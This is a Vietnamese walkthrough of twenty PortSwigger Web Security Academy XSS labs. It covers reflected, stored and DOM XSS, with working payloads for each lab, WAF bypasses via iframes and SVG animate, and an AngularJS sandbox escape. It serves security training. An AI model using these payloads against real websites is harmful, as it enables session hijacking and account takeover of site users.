# Lab 1: Reflected XSS into HTML context with nothing encoded
Đơn giản là chèn script vào ô tìm kiếm
```js
<script>alert("hi")</script>
```
# Lab 2: Stored XSS into HTML context with nothing encoded
Vẫn là script như trên nhưng lỗi XSS gặp ở phần comment
# Lab 3: DOM XSS in document.write sink using source location.search
Ở source code thì ta có script, script này thực hiện tìm kiếm thông qua hàm `trackSearch` để ghi nội dung vào DOM
Lúc này script trở thành
```js
document.write('<img src="/resources/images/tracker.gif?searchTerms=1">')
```
Ta sẽ payload `query` như sau
```
"><script>alert(1)</script>"
```
Script trở thành
```js
document.write('<img src="/resources/images/tracker.gif?searchTerms="><script>alert(1)</script>"">')
```
# Lab 4: DOM XSS in document.write sink using source location.search inside a select element
Xem source thì ta biết param `storeId` sẽ được tìm kiếm trên url là ghi vào DOM, nếu tìm thấy thì tức là storeId này đang được chọn và cũng ghi vào DOM
Tuy nhiên không có argument nào được validate, vậy ta chèn
# Lab 5: DOM XSS in innerHTML sink using source location.search
Lab này đã sử dụng `innerHTML`, tức là không cho phép sử dụng `script` hay `svg onload`
Tuy nhiên dùng `img` hoặc `iframe` cùng các event như `onload` và `onerror` vẫn được chấp nhận.
```js
<img src=1 onerror=alert(document.domain)>
```
# Lab 6: DOM XSS in jQuery anchor href attribute sink using location.search source
Đoạn script có chức năng sử dụng hàm `attr()` thay đổi thuộc tính `href` của thẻ a id `backLink`, bằng cách sử dụng dữ liệu từ URL được truyền qua param `returnPath`.
Ta sẽ payload như sau
```
?returnPath=javascript:alert(document.cookie)
```
# Lab 7: DOM XSS in jQuery selector sink using a hashchange event
Script dùng để bắt sự kiện `hashchange` trên cửa sổ và sau đó cuộn trang để hiển thị phần tử có url chứa giá trị hash tương ứng.
Payload
```
#<img src=1 onerror=alert(1)>
```
Vậy là ta có thể thêm bất kỳ error nào nếu muốn
Tuy nhiên, ta cần kích hoạt sự kiện `hashchange` mà không cần sự tương tác của người dùng bằng cách dùng `iframe`
```
<iframe src="https://0a0e00b604d1e7df82d66a5100530084.web-security-academy.net//#" onload="this.src+='<img src=1 onerror=print()>'"></iframe>
```
# Lab 8: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
Ta thấy web sử dụng thuộc tính `ng-app` trong thẻ html, chứng tỏ nó sử dụng framework AngularJS
Ngoài ra, xem source ta cũng biết web sử dụng Angular 1.7.7
AngularJS sẽ thực thi JavaScript bên trong dấu ngoặc nhọn đôi có thể xuất hiện trực tiếp trong HTML hoặc bên trong các thuộc tính. Chèn thử `hihi{{1+1}}`
Vậy nó thực thi được lệnh trong dấu ngoặc nhọn `{{}}`
Chèn tiếp
```
{{constructor.constructor('alert(1)')()}}
```
# Lab 9: Reflected DOM XSS
Khi search thì kết quả được trả về thông qua hàm `search` đối số `search-results`
Đọc file `searchResults.js` ta biết hàm này sau khi thực thi nhận được phản hồi status 200 sẽ sử dụng `eval()` để phân tích cú pháp của `responseText` thành một đối tượng JavaScript (searchResultsObj), sau đó gọi hàm displaySearchResults để hiển thị.
Quan sát JSON trả về có dạng
```json
{"results":[],"searchTerm":"abcd"}
```
Payload
```json
abcd"} + alert(1); //
```
tức là
```json
{"results":[],"searchTerm":"abcd"} + alert(1); //"}
```
JSON được chèn thêm ký tự `\`, trong JS thì được hiểu đây là ký tự thoát, những lệnh sau `"` đều không được thực thi
Chỉ cần double dấu `\` là xong
```
abcd\"} + alert(1); //
```
# Lab 10: Stored DOM XSS
Chèn thử `<script>alert(1)</script>` nhưng web chỉ hiện một phần của payload
Kiểm tra source thì thấy comment được xử lý thông qua code js trước khi load lên server
Web sử dụng replace() để mã hóa ký tự `<` và `>`
Tuy nhiên theo [doc](https://www.w3schools.com/jsref/jsref_replace.asp) thì replace chỉ thay thế ký tự xuất hiện đầu tiên
Vậy nên `</script>` đã biến mất
Payload
```
<><img src=1 onerror=alert(1)>
```
# Lab 11: Reflected XSS into HTML context with most tags and attributes blocked
Vẫn là chèn 1 script quen thuộc
Tuy nhiên script đã bị tường lửa chặn (WAF)
Để bypass WAF, ta sẽ brute-force xem những tag và event nào không bị chặn
Ta có list các tag ở [cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) này
Thẻ `body` và `custom tags` không bị filter
Tương tự với các event
Tìm kiếm payload trong cheat sheet
Giờ thì không bị chặn nữa
Payload
```
<iframe src="https://0ab900160404a52d8043260200500028.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
```
# Lab 12: Reflected XSS into HTML context with all tags blocked except custom ones
Lab này cũng bị chặn giống lab trước ngoài trừ custom tags
Ta tìm payload ở [cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) này
Payload
```js
<script>
location = 'https://0ad4006d04fa6ebe801a26de000b000d.web-security-academy.net/?search=%3Cxss+autofocus+tabindex=1+onfocus%3Dalert%28document.cookie%29%3E%3C/xss%3E';
</script>
```
# Lab 13: Reflected XSS with event handlers and href attributes blocked
Lab này cũng filter tag
Fuzz được các tag không bị block
Tuy nhiên `href` của thẻ `a` thì bị block
Xây dựng payload như sau:
Sử dụng `animate` để thay đổi giá trị của thuộc tính `href`, khi click vào liên kết thì nó sẽ gọi đến hàm `alert()`
```
<animate attributeName=href values=javascript:alert(1) />
```
Tạo 1 vùng văn bản lừa nạn nhân click vào
```
<text x=20 y=20>Click me</text>
```
Payload cuối cùng
```
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
```
# Lab 14: Reflected XSS with some SVG markup allowed
Lab này cũng filter tag
Brute-force tag hoạt động được, sử dụng [cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
Tìm được tag`<animatetransform>`, `<image>`, `<svg>`, `<title>` không bị filter
Ở đây ta sẽ sử dụng `svg`. Tìm kiếm payload trên cheat sheet
Payload với event `onbegin` thì đã giải được lab
```
<svg><animatetransform onbegin=alert(1) attributeName=transform>
```
# Lab 15: Reflected XSS into attribute with angle brackets HTML-encoded
Chèn thử `<script>alert(1)</script>` thì không thu được gì
Xem lại source thì thấy `<` và `>` đã bị mã hóa
Payload
```
" autofocus onfocus=alert(1) x="
```
# Lab 16: Stored XSS into anchor href attribute with double quotes HTML-encoded
Kiểm tra chức năng bình luận thấy thuộc tính href của thẻ a chứa đường dẫn đến website mà ta đã nhập
Dùng javascript pseudo-protocol để thực thi script. Payload:
```
javascript:alert(1)
```
# Lab 17: Reflected XSS in canonical link tag
Xem source thấy web sử dụng thẻ `link` với `canonical` link tag
Thử inject thuộc tính `accesskey` với sự kiện `onclick`, `accesskey` cho phép xác định 1 chữ cái khi được nhấn kết hợp với các phím khác sẽ khiến sự kiện xảy ra.
Payload:
```
/?'accesskey='x'onclick='alert(1)
```
# Lab 18: Reflected XSS into a JavaScript string with single quote and backslash escaped
Chèn script quen thuộc
Kết quả trả về hơi lạ
Xem source thì ta biết vì trước hết trình duyệt phân tích cú pháp HTML để xác định các thành phần trang, sau đó mới thực hiện các lệnh
Payload
```
</script><img src=1 onerror=alert(1)>
```
# Lab 19: Reflected XSS into a JavaScript string with angle brackets HTML encoded
Ở lab này dấu `<` và `>` đã bị mã hóa
Để thoát khỏi chuỗi này và gọi hàm `alert()`. Payload lại như sau
```
';alert(1);//
```
# Lab 20: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
Lab này đã mã hóa ký tự `<>`, `""` và bỏ qua ký tự `''`
Payload
```
\';alert(1)//
```
Sign in with Wallet
Connect another wallet